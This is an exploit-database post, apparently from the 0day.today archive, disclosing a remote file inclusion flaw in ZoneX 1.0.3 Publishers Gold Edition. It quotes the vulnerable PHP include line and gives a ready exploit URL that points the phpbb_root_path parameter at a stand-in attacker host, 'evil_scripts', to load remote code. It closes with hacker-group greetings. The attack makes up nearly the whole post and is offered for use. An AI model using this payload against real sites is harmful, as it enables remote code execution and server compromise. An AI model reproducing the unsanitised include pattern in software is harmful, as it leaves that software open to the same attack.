id: 660
date: 08/06/2006
title: ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion Vulnerability
author: xoron
cves: 

=======================================================================
ZoneX 1.0.3 Publishers Gold Edition Remote File Inclusion Vulnerability
=======================================================================



///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#ZoneX 1.0.3 - Publishers Gold Edition  Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: ZoneX 1.0.3 - Publishers Gold Edition
-
#Class : Remote
-
#CODE:    include($phpbb_root_path . 'newsletter/scripts/subscriptions.' .$phpEx)
-
#Exploit: http://www.site.com/[path]/includes/usercp_register.php?phpbb_root_path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\



#  0day.today [2023-03-24]  #